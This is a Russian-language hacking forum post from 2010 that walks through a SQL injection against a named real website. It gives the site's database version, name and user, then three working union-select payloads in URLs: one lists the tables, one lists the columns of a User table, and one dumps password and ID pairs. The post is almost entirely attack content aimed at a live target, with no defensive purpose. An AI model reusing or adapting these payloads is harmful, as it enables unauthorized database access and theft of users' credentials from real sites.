Показать сообщение отдельно

  #7  
Старый 05.09.2010, 21:01
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию

BENCHMARK

psa.org.au
Version: 5.0.32-Debian_7etch10-log

Database: psa_www

User: psa_www_ro@localhost


выводим все таблицы:

Цитата:
Сообщение от None  
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(25,@o :=CONCAT(@o,0x0d0a,(SELECT @i:=table_name from information_schema.tables WHERE table_schema=0x7073615f777777 and table_name>@i order by table_name LIMIT 1))),@o),0x696e6a64617461656e64),4--
затем колонки:

Цитата:
Сообщение от None  
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(6,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=column_name) from information_schema.columns WHERE table_schema=0x7073615f777777 and table_name = 0x55736572 and column_name>@i order by column_name LIMIT 1))),@o),0x696e6a64617461656e64),4--
и дампим данные:

Цитата:
Сообщение от None  
http://www.psa.org.au/site.php?id=3809 and 1=0 union select 0,1,2,concat(0x696e6a64617461626567696e,concat(@i: =0x00,@o:=0x0d0a,benchmark(55,@o :=CONCAT(@o,0x0d0a,(SELECT concat(Password,0x3a,@i:=ID) from psa_www.User WHERE ID>@i order by ID LIMIT 1))),@o),0x696e6a64617461656e64),4--
всё, 1300 страница))
 
Ответить с цитированием